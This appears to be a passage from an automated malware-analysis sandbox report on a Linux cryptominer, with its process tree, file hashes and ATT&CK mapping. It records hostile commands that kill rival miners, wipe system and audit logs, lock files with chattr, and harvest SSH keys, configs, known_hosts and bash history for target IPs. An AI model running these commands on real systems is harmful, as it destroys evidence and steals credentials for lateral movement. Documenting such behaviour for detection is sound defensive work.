    ps aux
    3⤵
    - Reads runtime system information
    PID:1531
- - /bin/grep
    grep -v grep
    3⤵
    PID:1532
- - /bin/grep
    grep kdevtmpfsi
    3⤵
    PID:1533
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1534
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1535
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1536
- - /bin/grep
    grep -v grep
    3⤵
    PID:1537
- - /bin/grep
    grep kinsing
    3⤵
    PID:1538
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1539
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1540
- - /bin/ps
    ps aux
    3⤵
    PID:1541
- - /bin/grep
    grep -v grep
    3⤵
    PID:1542
- - /bin/grep
    grep supportxmr
    3⤵
    PID:1543
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1544
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1545
- - /bin/ps
    ps aux
    3⤵
    PID:1546
- - /bin/grep
    grep -v grep
    3⤵
    PID:1547
- - /bin/grep
    grep xmr
    3⤵
    PID:1548
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1549
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1550
- - /bin/ps
    ps aux
    3⤵
    PID:1551
- - /bin/grep
    grep -v grep
    3⤵
    PID:1552
- - /bin/grep
    grep kthreaddw
    3⤵
    PID:1553
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1554
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1555
- - /bin/rm
    rm -rf "/tmp/*"
    3⤵
    PID:1556
- - /bin/rm
    rm -rf "/var/tmp/*"
    3⤵
    PID:1557
- - /bin/rm
    rm -rf "/dev/shm/*"
    3⤵
    PID:1558
- - /bin/sleep
    sleep 3
    3⤵
    PID:1559
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1560
- - /bin/grep
    grep -v grep
    3⤵
    PID:1561
- - /bin/grep
    grep miner
    3⤵
    PID:1562
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1563
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1564
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1565
- - /bin/grep
    grep -v grep
    3⤵
    PID:1566
- - /bin/grep
    grep gitlabw
    3⤵
    PID:1567
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1568
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1569
- - /bin/ps
    ps aux
    3⤵
    PID:1570
- - /bin/grep
    grep -v grep
    3⤵
    PID:1571
- - /bin/grep
    grep xmp
    3⤵
    PID:1572
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1573
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1574
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1575
- - /bin/grep
    grep -v grep
    3⤵
    PID:1576
- - /bin/grep
    grep juiceSSH
    3⤵
    PID:1577
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1578
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1579
- - /bin/ps
    ps aux
    3⤵
    PID:1580
- - /bin/grep
    grep khnug
    3⤵
    PID:1582
- - /bin/grep
    grep -v grep
    3⤵
    PID:1581
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1583
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1584
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1585
- - /bin/grep
    grep -v grep
    3⤵
    PID:1586
- - /bin/grep
    grep Linux2
    3⤵
    PID:1587
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1588
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1589
- - /bin/ps
    ps aux
    3⤵
    - Reads runtime system information
    PID:1590
- - /bin/grep
    grep -v grep
    3⤵
    PID:1591
- - /bin/grep
    grep kthreaddi
    3⤵
    PID:1592
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1593
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1594
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1595
- - /bin/grep
    grep kkssl
    3⤵
    PID:1597
- - /bin/grep
    grep -v grep
    3⤵
    PID:1596
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1598
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1599
- - /bin/ps
    ps aux
    3⤵
    PID:1600
- - /bin/grep
    grep -v grep
    3⤵
    PID:1601
- - /bin/grep
    grep cnrig
    3⤵
    PID:1602
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1603
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1604
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1605
- - /bin/grep
    grep -v grep
    3⤵
    PID:1606
- - /bin/grep
    grep stratum
    3⤵
    PID:1607
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1608
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1609
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1610
- - /bin/grep
    grep -v grep
    3⤵
    PID:1611
- - /bin/grep
    grep vscode
    3⤵
    PID:1612
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1613
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1614
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1615
- - /bin/grep
    grep -v grep
    3⤵
    PID:1616
- - /bin/grep
    grep "runsv puma"
    3⤵
    PID:1617
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1618
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1619
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1620
- - /bin/grep
    grep -v grep
    3⤵
    PID:1621
- - /bin/grep
    grep xmrig
    3⤵
    PID:1622
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1623
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1624
- - /bin/ps
    ps aux
    3⤵
    PID:1625
- - /bin/grep
    grep -v grep
    3⤵
    PID:1626
- - /bin/grep
    grep c3pool
    3⤵
    PID:1627
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1628
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1629
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1630
- - /bin/grep
    grep -v grep
    3⤵
    PID:1631
- - /bin/grep
    grep kthreaddk
    3⤵
    PID:1632
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1633
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1634
- - /bin/ps
    ps aux
    3⤵
    PID:1635
- - /bin/grep
    grep -v grep
    3⤵
    PID:1636
- - /bin/grep
    grep pool
    3⤵
    PID:1637
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1638
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1639
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1640
- - /bin/grep
    grep -v grep
    3⤵
    PID:1641
- - /bin/grep
    grep dbused
    3⤵
    PID:1642
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1643
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1644
- - /bin/ps
    ps aux
    3⤵
    PID:1645
- - /bin/grep
    grep -v grep
    3⤵
    PID:1646
- - /bin/grep
    grep kdevtmpfsi
    3⤵
    PID:1647
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1648
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1649
- - /bin/ps
    ps aux
    3⤵
    PID:1650
- - /bin/grep
    grep -v grep
    3⤵
    PID:1651
- - /bin/grep
    grep kinsing
    3⤵
    PID:1652
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1653
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1654
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1655
- - /bin/grep
    grep -v grep
    3⤵
    PID:1656
- - /bin/grep
    grep supportxmr
    3⤵
    PID:1657
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1658
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1659
- - /bin/ps
    ps aux
    3⤵
    PID:1660
- - /bin/grep
    grep -v grep
    3⤵
    PID:1661
- - /bin/grep
    grep xmr
    3⤵
    PID:1662
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1663
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1664
- - /bin/ps
    ps aux
    3⤵
    - Reads runtime system information
    PID:1665
- - /bin/grep
    grep -v grep
    3⤵
    PID:1666
- - /bin/grep
    grep kthreaddw
    3⤵
    PID:1667
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1668
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1669
- - /bin/rm
    rm -rf "/tmp/*"
    3⤵
    PID:1670
- - /bin/rm
    rm -rf "/var/tmp/*"
    3⤵
    PID:1671
- - /bin/rm
    rm -rf "/dev/shm/*"
    3⤵
    PID:1672
- - /bin/sleep
    sleep 3
    3⤵
    PID:1673
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1674
- - /bin/grep
    grep -v grep
    3⤵
    PID:1675
- - /bin/grep
    grep miner
    3⤵
    PID:1676
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1677
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1678
- /usr/bin/chattr
  chattr -ia /usr/lib/procf/kexec
  2⤵
  PID:930
- /bin/rm
  rm -f /usr/lib/procf/kexec
  2⤵
  PID:931
- /usr/bin/chattr
  chattr +i /usr/lib/procf
  2⤵
  PID:932
- /usr/bin/id
  id -u
  2⤵
  PID:1016
- /bin/rm
  rm -rf /etc/systemd/system/systemd_s.service
  2⤵
  PID:1017
- /bin/systemctl
  systemctl stop systemd_s.service
  2⤵
  - Enumerates kernel/hardware configuration
  PID:1018
- /bin/rm
  rm -rf /var/log/alternatives.log /var/log/apt /var/log/audit /var/log/auth.log /var/log/btmp /var/log/daemon.log /var/log/debug /var/log/dpkg.log /var/log/exim4 /var/log/faillog /var/log/fontconfig.log /var/log/installer /var/log/kern.log /var/log/lastlog /var/log/messages /var/log/syslog /var/log/user.log /var/log/wtmp
  2⤵
  - Deletes Audit logs
  - Deletes system logs
  - Deletes log files
  PID:1024
- /bin/rm
  rm -rf "/var/tmp/*"
  2⤵
  PID:1025
- /bin/rm
  rm -f /tmp/lit
  2⤵
  PID:1031
- /bin/rm
  rm -f /tmp/xxt
  2⤵
  PID:1032
- /bin/cat
  cat /dev/null
  2⤵
  PID:1033
- /bin/cat
  cat /dev/null
  2⤵
  PID:1034
- /bin/cat
  cat /dev/null
  2⤵
  PID:1035
- /bin/cat
  cat /dev/null
  2⤵
  PID:1041
- /bin/cat
  cat /dev/null
  2⤵
  PID:1042
- /bin/cat
  cat /dev/null
  2⤵
  PID:1043
- /bin/cat
  cat /dev/null
  2⤵
  PID:1044
- /bin/rm
  rm -rf /var/mail/root
  2⤵
  PID:1045
- /bin/rm
  rm -f /tmp/s.service
  2⤵
  PID:1051
- /bin/rm
  rm -rf /var/spool/mail/root
  2⤵
  PID:1052
- /bin/cat
  cat /dev/null
  2⤵
  PID:1053
- /bin/rm
  rm -f /tmp/.xx
  2⤵
  PID:1054
- /bin/rm
  rm -f /tmp/.xxx
  2⤵
  PID:1055
- /bin/rm
  rm -f /tmp/tt
  2⤵
  PID:1061
- /bin/rm
  rm -f /tmp/.x
  2⤵
  PID:1062
- /bin/rm
  rm -rf /tmp/.cc
  2⤵
  PID:1063
- /bin/rm
  rm -rf /var/tmp/.sf
  2⤵
  PID:1064

/bin/ps
ps -ef
1⤵
- Reads CPU attributes
- Reads runtime system information
PID:741

/bin/grep
grep "\\[network-managerr]"
1⤵
PID:742

/bin/grep
grep -v grep
1⤵
PID:743

/usr/bin/wc
wc -l
1⤵
PID:744

/bin/hostname
hostname
1⤵
PID:761

/bin/ps
ps -ef
1⤵
PID:763

/bin/grep
grep "\\[ipv6_addrconfd]"
1⤵
PID:764

/bin/grep
grep -v grep
1⤵
PID:765

/usr/bin/wc
wc -l
1⤵
PID:766

/usr/bin/find
find /root/ /root /home -maxdepth 2 -name "id_rsa*"
1⤵
PID:934

/bin/grep
grep -vw pub
1⤵
PID:935

/bin/cat
cat /root/.ssh/config "/home/*/.ssh/config" /root/.ssh/config
1⤵
PID:942

/bin/grep
grep IdentityFile
1⤵
PID:943

/usr/bin/awk
awk -F IdentityFile "{print \$2 }"
1⤵
PID:944

/usr/bin/find
find /root/ /root /home -maxdepth 3 -name "*.pem"
1⤵
PID:946

/usr/bin/uniq
uniq
1⤵
PID:947

/bin/cat
cat /root/.ssh/config "/home/*/.ssh/config" /root/.ssh/config
1⤵
PID:954

/bin/grep
grep HostName
1⤵
PID:955

/usr/bin/awk
awk -F HostName "{print \$2}"
1⤵
PID:956

/bin/cat
cat /root/.bash_history "/home/*/.bash_history" /root/.bash_history
1⤵
PID:959

/bin/grep
grep -E "(ssh|scp)"
1⤵
PID:961

/bin/grep
grep -oP "([0-9]{1,3}\\.){3}[0-9]{1,3}"
1⤵
PID:963

/bin/cat
cat "/root/*/.ssh/known_hosts" "/home/*/.ssh/known_hosts" /root/.ssh/known_hosts
1⤵
PID:967

/bin/grep
grep -oP "([0-9]{1,3}\\.){3}[0-9]{1,3}"
1⤵
PID:968

/usr/bin/uniq
uniq
1⤵
PID:969

/usr/bin/find
find /root/ /root /home -maxdepth 2 -name "\\.ssh"
1⤵
PID:976

/usr/bin/uniq
uniq
1⤵
PID:977

/usr/bin/xargs
xargs find
1⤵
PID:978
- /usr/local/sbin/find
  find
  2⤵
  PID:983
- /usr/local/bin/find
  find
  2⤵
  PID:983
- /usr/sbin/find
  find
  2⤵
  PID:983
- /usr/bin/find
  find
  2⤵
  PID:983

/usr/bin/awk
awk /id_rsa/
1⤵
PID:979

/usr/bin/awk
awk -F/ "{print \$3}"
1⤵
PID:980

/usr/bin/uniq
uniq
1⤵
PID:981

/bin/grep
grep -v "\\.ssh"
1⤵
PID:982

/usr/bin/tr
tr " " "\\n"
1⤵
PID:991

/usr/bin/nl
nl
1⤵
PID:992

/usr/bin/sort
sort -u -k2
1⤵
PID:993

/usr/bin/sort
sort -n
1⤵
PID:994

/usr/bin/cut
cut -f2-
1⤵
PID:995

/bin/grep
grep -vw 127.0.0.1
1⤵
PID:998

/usr/bin/tr
tr " " "\\n"
1⤵
PID:999

/usr/bin/nl
nl
1⤵
PID:1000

/usr/bin/sort
sort -u -k2
1⤵
PID:1001

/usr/bin/sort
sort -n
1⤵
PID:1002

/usr/bin/cut
cut -f2-
1⤵
PID:1003

/usr/bin/tr
tr " " "\\n"
1⤵
PID:1006

/usr/bin/nl
nl
1⤵
PID:1007

/usr/bin/sort
sort -u -k2
1⤵
PID:1008

/usr/bin/sort
sort -n
1⤵
PID:1009

/usr/bin/cut
cut -f2-
1⤵
PID:1010

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Hijack Execution Flow

T1574

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Hijack Execution Flow

T1574

Defense Evasion

Hijack Execution Flow

T1574

Indicator Removal

T1070

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Dynamic Resolution

T1568

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/.sock

Filesize
313KB

MD5
22859a1bb58e233a63e48f27a6dbe938

SHA1
8e1af9059749cc150960529fffc16a293cc781a8

SHA256
21098b1460064cda8d17373098fa25f813be4648783b735109a7f0bf160d477e

SHA512
75d8fec4bb328a537c3b16206dee54e61fdae99e93f74055d8258b5efc1d29b1a91f900e7c0beb035971e5b773882d02000f5141097b02a974853d3d5fb0ef86

Download Submit
/usr/lib/procf/deamon-hoster

Filesize
1KB

MD5
8eea56f798cb270e1d4ecc5e79d2d7f8

SHA1
4c028cc1afc3011da62e9ceee713799d72bb1115

SHA256
4c95865dfc6b392259c3094d036888acd3cd414177b223ac035fcc7d37a3cacc

SHA512
b8487e3b55d279c6ca5aaea742da40bd443da1fe2c69537bead71ca44cb558aa2fc6c3a675960a340271e3028d1df7dea3c9d977c72b3b5c87824108eec19a65

Download Submit
/usr/lib/procf/kexec

Filesize
40KB

MD5
118b0b99382b23ab4b348a3684e59a0e

SHA1
e5c9545f0c2d46f10f168f5f0689e53dd2d2ca57

SHA256
7ffb15ff3edcbcadb15790ad22496bc435cc4550d127fc29f07562df59267bdb

SHA512
427df9bf52900196faf82d6bb45f7e121497279ddb89f9168daaa14b2fe80c18766f432e1b166a1379e87557c20fa581b5ed91bcdbb7b8760ff4ac874d083819

Download Submit
/usr/lib/procf/x

Filesize
71KB

MD5
d37220305183057a2cc9f0a2ded2ce68

SHA1
e71df2d25a1798db0400ba6699a8ce79a254a6bd

SHA256
99699176006df3d4fac02309d1911d18bb559b8245c70f9980d60f2354a556bf

SHA512
f976bf162fac936b3de4a75e738945df303baf31183870b2e19390a28281666985fac72b3cc82bd5e520a547ff7f18fc0ee6b3b94cb5c731a472df16723634dc

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads